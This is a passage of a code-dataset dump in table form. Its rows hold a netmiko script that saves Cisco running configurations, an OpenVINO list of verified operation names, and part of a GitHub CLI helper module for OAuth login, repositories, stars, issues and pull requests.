max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
---|---|---|---|---|---|---|---|---|---|---|
netmiko/example7.py | Tes3awy/Ntemiko-Examples | 3 | 8000 | # Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Conevrt data frame from MGMT IP Address to a list
device_ip_list = df.iloc[:, 1].tolist()
# Define devices variable
devices = []
for ip in device_ip_list:
devices.append(
{
"device_type": "cisco_ios", # must be the same for all devices
"ip": ip,
"username": "developer", # must be the same for all devices
"password": "<PASSWORD>", # must be the same for all devices
"port": 22, # must be the same for all devices
# If port for all devices is not 22 you will get an error
"fast_cli": False,
}
)
for device in devices:
# Create a connection instance
with ConnectHandler(**device) as net_connect:
# hostname of the current device
hostname = net_connect.send_command(
command_string="show version", use_textfsm=True
)[0]["hostname"]
run_cfg: str = net_connect.send_command(command_string="show running-config")
# Create .txt for each running configuration of each device
with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
outfile.write(run_cfg.lstrip())
print("Done")
| # Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Conevrt data frame from MGMT IP Address to a list
device_ip_list = df.iloc[:, 1].tolist()
# Define devices variable
devices = []
for ip in device_ip_list:
devices.append(
{
"device_type": "cisco_ios", # must be the same for all devices
"ip": ip,
"username": "developer", # must be the same for all devices
"password": "<PASSWORD>", # must be the same for all devices
"port": 22, # must be the same for all devices
# If port for all devices is not 22 you will get an error
"fast_cli": False,
}
)
for device in devices:
# Create a connection instance
with ConnectHandler(**device) as net_connect:
# hostname of the current device
hostname = net_connect.send_command(
command_string="show version", use_textfsm=True
)[0]["hostname"]
run_cfg: str = net_connect.send_command(command_string="show running-config")
# Create .txt for each running configuration of each device
with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
outfile.write(run_cfg.lstrip())
print("Done")
| en | 0.777782 | # Must run example4.py first # Read an Excel sheet and save running config of devices using pandas # Read Excel file of .xlsx format # Convert data to data frame # Conevrt data frame from MGMT IP Address to a list # Define devices variable # must be the same for all devices # must be the same for all devices # must be the same for all devices # must be the same for all devices # If port for all devices is not 22 you will get an error # Create a connection instance # hostname of the current device # Create .txt for each running configuration of each device | 2.649545 | 3 |
inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | plaidml/openvino | 0 | 8001 | # Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
VERIFIED_OP_REFERENCES = [
'Abs-1',
'Acos-1',
'Add-1',
'Asin-1',
'Asinh-3',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BatchToSpace-2',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'Ceiling-1',
'CTCGreedyDecoder-1',
'CTCGreedyDecoderSeqLen-6',
'Concat-1',
'Convert-1',
'ConvertLike-1',
'Convolution-1',
'Constant-1',
'Cos-1',
'Cosh-1',
'DeformableConvolution-1',
'DeformablePSROIPooling-1',
'DepthToSpace-1',
'DetectionOutput-1',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'FakeQuantize-1',
'Floor-1'
'FloorMod-1'
'GRUSequence-5',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GRN-1',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-1',
'Interpolate-4',
'LRN-1',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'Maximum-1',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'Negative-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'NonZero-3',
'NormalizeL2-1',
'PriorBox-1',
'PriorBoxClustered-1',
'Proposal-1',
'Proposal-4',
'PSROIPooling-1',
'RNNSequence-5',
'ROIAlign-3',
'ROIPooling-2',
'Range-1',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceLogicalAnd-1',
'ReduceLogicalOr-1',
'ReduceMax-1',
'ReduceMean-1',
'ReduceMin-1',
'ReduceProd-1',
'ReduceSum-1',
'RegionYOLO-1',
'Relu-1',
'ReorgYOLO-2',
'Result-1'
'Round-5',
'SpaceToDepth-1',
'ScatterNDUpdate-4',
'Select-1',
'ShapeOf-1',
'ShapeOf-3',
'ShuffleChannels-1',
'Sigmoid-1',
'Sign-1',
'Sin-1',
'Sinh-1'
'SoftPlus-4',
'Softmax-1',
'Split-1',
'Squeeze-1',
'StridedSlice-1',
'Subtract-1',
'Swish-4',
'Tile-1',
'TopK-1',
'TopK-3',
'Transpose-1',
'Unsqueeze-1',
'VariadicSplit-1',
]
| # Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
VERIFIED_OP_REFERENCES = [
'Abs-1',
'Acos-1',
'Add-1',
'Asin-1',
'Asinh-3',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BatchToSpace-2',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'Ceiling-1',
'CTCGreedyDecoder-1',
'CTCGreedyDecoderSeqLen-6',
'Concat-1',
'Convert-1',
'ConvertLike-1',
'Convolution-1',
'Constant-1',
'Cos-1',
'Cosh-1',
'DeformableConvolution-1',
'DeformablePSROIPooling-1',
'DepthToSpace-1',
'DetectionOutput-1',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'FakeQuantize-1',
'Floor-1'
'FloorMod-1'
'GRUSequence-5',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GRN-1',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-1',
'Interpolate-4',
'LRN-1',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'Maximum-1',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'Negative-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'NonZero-3',
'NormalizeL2-1',
'PriorBox-1',
'PriorBoxClustered-1',
'Proposal-1',
'Proposal-4',
'PSROIPooling-1',
'RNNSequence-5',
'ROIAlign-3',
'ROIPooling-2',
'Range-1',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceLogicalAnd-1',
'ReduceLogicalOr-1',
'ReduceMax-1',
'ReduceMean-1',
'ReduceMin-1',
'ReduceProd-1',
'ReduceSum-1',
'RegionYOLO-1',
'Relu-1',
'ReorgYOLO-2',
'Result-1'
'Round-5',
'SpaceToDepth-1',
'ScatterNDUpdate-4',
'Select-1',
'ShapeOf-1',
'ShapeOf-3',
'ShuffleChannels-1',
'Sigmoid-1',
'Sign-1',
'Sin-1',
'Sinh-1'
'SoftPlus-4',
'Softmax-1',
'Split-1',
'Squeeze-1',
'StridedSlice-1',
'Subtract-1',
'Swish-4',
'Tile-1',
'TopK-1',
'TopK-3',
'Transpose-1',
'Unsqueeze-1',
'VariadicSplit-1',
]
| en | 0.269678 | # Copyright (C) 2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 | 1.222661 | 1 |
ghub/githubutils.py | mahanthathreyee/ghub | 0 | 8002 | """Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
reauthorize -- performs authorization again (default False)
"""
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
def get_user(ghub, user):
url = ghub.api_url + ghub.endpoints["users"] + user
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "user"
ghub.context.location = user
ghub.context.cache = response.json()
return True
return False
def get_org(ghub, org):
url = ghub.api_url + ghub.endpoints["orgs"] + org
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "org"
ghub.context.location = org
ghub.context.cache = response.json()
return True
return False
def get_user_tabs(ghub, tab=""):
tabs = ["repos", "stars", "followers", "following", "notifications"]
if tab not in tabs:
print("{} is not a valid user tab".format(tab))
return
if ghub.context.context == "root":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
response = ghub.github.get(ghub.api_url + ghub.endpoints["user"] + "/repos")
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "repos"
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "stars"
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/" + tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif tab == "notifications":
response = ghub.github.get(ghub.api_url + ghub.endpoints["notifications"])
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif ghub.context.context == "user" or ghub.context.context == "org":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
if ghub.context.context == "user":
url = (
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/repos"
)
else:
url = (
ghub.api_url
+ ghub.endpoints["orgs"]
+ ghub.context.location
+ "/repos"
)
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "repos"
)
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "star"
)
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/"
+ tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.context.prev_context.location + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
else:
pass
def get_latest_commit(ghub, repo, branch="master"):
api_url = "https://api.github.com/repos/{}/branches/{}".format(repo, branch)
response = ghub.github.get(api_url)
if response.status_code == 200:
response = response.json()
return response["commit"]["commit"]
else:
return False
def get_tree(ghub, repo=None, branch="master", tree_url=None):
if tree_url == None:
latest_commit = get_latest_commit(ghub, repo, branch)
if latest_commit == False:
return False
response = ghub.github.get(latest_commit["tree"]["url"])
if response.status_code == 200:
response = response.json()
return response
return False
else:
response = ghub.github.get(tree_url)
if response.status_code == 200:
response = response.json()
return response
def get_blob(ghub, blob_url):
response = ghub.github.get(blob_url)
if response.status_code == 200:
return response.json()
return False
def clone_repo(ghub, dir, repo_name=None):
print("Preparing to clone...")
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
if dir[0] == "~":
dir = os.path.expanduser("~") + dir[1:]
dir = dir + "/" + repo_name.split("/")[1]
try:
Repo.clone_from("https://github.com/" + repo_name, dir)
print("{} cloned to {}".format(repo_name, dir))
return True
except Exception as e:
print(e)
return False
def star_repo(ghub, repo_name=None):
print("Starring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
print("Repo is already starred.")
elif response.status_code == 404:
resp = ghub.github.put(star_url)
if resp.status_code == 204:
print("{} starred".format(repo_name))
else:
print("Error starring repo")
def unstar_repo(ghub, repo_name=None):
print("Unstarring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
resp = ghub.github.delete(star_url)
if resp.status_code == 204:
print("{} unstarred".format(repo_name))
else:
print("Error unstarring repo")
elif response.status_code == 404:
print("Repo is not starred.")
def watch_repo(ghub, repo_name=None):
print("Subscribing to repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
print("You are already watching this repo.")
elif response.status_code == 404:
resp = ghub.github.put(watch_url)
if resp.status_code == 200:
print("Watching {}".format(repo_name))
else:
print("Error subscribing to repo")
def unwatch_repo(ghub, repo_name=None):
print("Unsubscribing repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
resp = ghub.github.delete(watch_url)
if resp.status_code == 204:
print("{} unsubscribed".format(repo_name))
else:
print("Error unsubscribing to repo")
elif response.status_code == 404:
print("You are not watching this repo.")
def fork_repo(ghub, repo_name=None):
print("Forking Repo...")
if repo_name == None:
repo_name = ghub.context.location.split("/")
repo_name = "/".join(repo_name[:2])
true_repo_name = repo_name.split("/")[1]
forked_url = (
ghub.api_url
+ ghub.endpoints["repos"]
+ ghub.get_user_username()
+ "/"
+ true_repo_name
)
response = ghub.github.get(forked_url)
if response.status_code == 200:
print("Cannot fork. Repo Already Exists.")
return False
print("Repo is being forked. Please wait for it to complete.", end="")
response = ghub.github.post(
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/forks"
)
if response.status_code == 202:
print(
"\nForking complete. Forked repo to {}".format(
ghub.get_user_username() + "/" + true_repo_name
)
)
return True
else:
print("Error while trying fork.")
return False
def get_prs(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls"
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_requests"
ghub.context.location = repo_name + "/pull_requests"
ghub.context.cache = response.json()
return True
return False
def get_pr(ghub, pr_no):
if not pr_no.isdigit():
print("Invalid PR number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls/" + pr_no
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_request"
ghub.context.location = repo_name + "/pull_requests/" + pr_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No PR found with PR number {}".format(pr_no))
return False
def get_pr_info(ghub, info_type="comments"):
info_url = ghub.context.cache["_links"][info_type]["href"]
response = ghub.github.get(info_url)
return response.json(), response.status_code
def get_issues(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues"
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issues"
ghub.context.location = repo_name + "/issues"
ghub.context.cache = response.json()
return True
return False
def get_issue(ghub, issue_no):
if not issue_no.isdigit():
print("Invalid issue number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = (
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues/" + issue_no
)
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issue"
ghub.context.location = repo_name + "/issues/" + issue_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No issue found with issue number {}".format(issue_no))
return False
def get_issue_info(ghub, info_type="comments"):
info_url = ghub.context.cache["{}_url".format(info_type)]
response = ghub.github.get(info_url)
return response.json(), response.status_code
| """Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
reauthorize -- performs authorization again (default False)
"""
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
def get_user(ghub, user):
url = ghub.api_url + ghub.endpoints["users"] + user
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "user"
ghub.context.location = user
ghub.context.cache = response.json()
return True
return False
def get_org(ghub, org):
url = ghub.api_url + ghub.endpoints["orgs"] + org
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "org"
ghub.context.location = org
ghub.context.cache = response.json()
return True
return False
def get_user_tabs(ghub, tab=""):
tabs = ["repos", "stars", "followers", "following", "notifications"]
if tab not in tabs:
print("{} is not a valid user tab".format(tab))
return
if ghub.context.context == "root":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
response = ghub.github.get(ghub.api_url + ghub.endpoints["user"] + "/repos")
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "repos"
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "stars"
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/" + tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif tab == "notifications":
response = ghub.github.get(ghub.api_url + ghub.endpoints["notifications"])
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif ghub.context.context == "user" or ghub.context.context == "org":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
if ghub.context.context == "user":
url = (
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/repos"
)
else:
url = (
ghub.api_url
+ ghub.endpoints["orgs"]
+ ghub.context.location
+ "/repos"
)
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "repos"
)
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "star"
)
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/"
+ tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.context.prev_context.location + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
else:
pass
def get_latest_commit(ghub, repo, branch="master"):
api_url = "https://api.github.com/repos/{}/branches/{}".format(repo, branch)
response = ghub.github.get(api_url)
if response.status_code == 200:
response = response.json()
return response["commit"]["commit"]
else:
return False
def get_tree(ghub, repo=None, branch="master", tree_url=None):
if tree_url == None:
latest_commit = get_latest_commit(ghub, repo, branch)
if latest_commit == False:
return False
response = ghub.github.get(latest_commit["tree"]["url"])
if response.status_code == 200:
response = response.json()
return response
return False
else:
response = ghub.github.get(tree_url)
if response.status_code == 200:
response = response.json()
return response
def get_blob(ghub, blob_url):
response = ghub.github.get(blob_url)
if response.status_code == 200:
return response.json()
return False
def clone_repo(ghub, dir, repo_name=None):
print("Preparing to clone...")
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
if dir[0] == "~":
dir = os.path.expanduser("~") + dir[1:]
dir = dir + "/" + repo_name.split("/")[1]
try:
Repo.clone_from("https://github.com/" + repo_name, dir)
print("{} cloned to {}".format(repo_name, dir))
return True
except Exception as e:
print(e)
return False
def star_repo(ghub, repo_name=None):
print("Starring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
print("Repo is already starred.")
elif response.status_code == 404:
resp = ghub.github.put(star_url)
if resp.status_code == 204:
print("{} starred".format(repo_name))
else:
print("Error starring repo")
def unstar_repo(ghub, repo_name=None):
print("Unstarring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
resp = ghub.github.delete(star_url)
if resp.status_code == 204:
print("{} unstarred".format(repo_name))
else:
print("Error unstarring repo")
elif response.status_code == 404:
print("Repo is not starred.")
def watch_repo(ghub, repo_name=None):
print("Subscribing to repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
print("You are already watching this repo.")
elif response.status_code == 404:
resp = ghub.github.put(watch_url)
if resp.status_code == 200:
print("Watching {}".format(repo_name))
else:
print("Error subscribing to repo")
def unwatch_repo(ghub, repo_name=None):
print("Unsubscribing repo...")
if repo_name == None:
repo_name = ghub.context.location
